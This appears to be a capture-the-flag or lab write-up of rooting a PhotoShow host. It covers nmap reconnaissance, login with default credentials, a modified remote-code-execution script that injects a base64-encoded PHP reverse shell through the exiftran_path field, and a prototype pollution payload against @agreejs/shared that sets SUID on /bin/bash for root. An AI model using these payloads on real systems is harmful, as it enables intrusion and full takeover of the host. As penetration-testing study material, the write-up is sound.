Host entries
1
10.0.160.221
Content
- Default Credentials
- PhotoShow 3.0 - Remote Code Execution (RCE)
- @agreejs/shared Prototype Pollution
Reconnaissance
Initial reconnaissance for TCP ports
1
2
3
4
nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.160.221
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.160.221 () Status: Up
Host: 10.0.160.221 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
Services and Versions running:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -p22,80 -sCV -n -Pn -vvvv -oN targeted 10.0.160.221
Nmap scan report for 10.0.160.221
Host is up, received user-set (0.15s latency).
Scanned at 2025-02-20 19:00:34 EST for 41s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 256 ca:a0:22:83:88:f3:e3:ed:6f:3d:59:ba:bd:3c:f1:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHP4VhDww7U3k3GJxGqRFXN6xzDoOuF9TFiuKrlaP+twLHPWCLe1V7JIBgcL1JF3uf0Li/36H99aZbHUKuv7Z98=
| 256 3d:80:07:18:b3:84:60:08:85:c8:68:c9:5a:f1:b0:09 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHOMTnmLCLW8d7QVNNH3UKLr8W03N/+RlL+LN6Nkalcx
80/tcp open http syn-ack ttl 63 nginx 1.18.0
|_http-title: PhotoShow
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-favicon: Unknown favicon MD5: 7D314C14444028B644D54DC1C8F65E43
Exploitation
The target has only an HTTP service running besides the SSH, on it there is a PhotoShow CMS, I’ve tried with some default credentials and the pair that worked was admin:password: 
This CMS is vulnerable to PhotoShow - Remote Code Execution, I downloaded the script and after some attempts I got a successful shell by modifying the payload on the script from bash -c 'bash -i.. for this one:
1
2
3
4
5
6
def createInjection(attackerIp, attackerNcPort):
textToEncode = "php -r '$sock=fsockopen(\"" + attackerIp + "\"," + attackerNcPort + ");exec(\"sh <&3 >&3 2>&3\");'"
b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
strb64 = str(b64Encoded)[2:-1]
injection = {"exiftran_path": "echo " + strb64 + " | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
return urllib.parse.urlencode(injection)
For some reason only php revshell payload works, after that we got a shell.
Privilege Escalation
I then proceed to execute the command sudo -l and I can execute a script as user root without password:
1
2
3
4
5
6
www-data@contract:~/html$ sudo -l
Matching Defaults entries for www-data on contract:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on contract:
(ALL : ALL) NOPASSWD: /usr/bin/agreement
This is the content of it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wwww-data@contract:~/html$ cat /usr/bin/agreement
#! /usr/bin/env node
var args = process.argv.slice(2);
(async () => {
const lib = await import('@agreejs/shared');
const { exec } = await import('child_process');
var components=JSON.parse(args[0])
try {
lib.mergeInternalComponents (components)
} catch (e) { }
var user = {}
if(user.authenticated===true)
{
exec(user.cmd);
}
})();
As usual, the vulnerability relays on the imported library, in this case @agreejs/shared, there is a vulnerability reported as Remote code execution in @agreejs/shared, after reading the article and with the aid of DeepSeek I came with the following payload:
1
2
3
www-data@contract:~/html$ sudo /usr/bin/agreement '{"__proto__":{"authenticated":true,"cmd":"chmod +s /bin/bash"}}'
www-data@contract:~/html$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
And we ARE INSIDEEEE!!!
Post Exploitation
Flags are stored at:
/etc/passwd /etc/shadow /proc/1/environ /root
Credentials
- Credentials identified for PhotoShow are
admin:password
Notes
- Sometimes the public exploits only work on certain environments, in this case we needed to modify ours so we can successfully exploit the vulnerability in the CMS, so it is a good idea to always have more than one revshell payload to avoid this scenarios.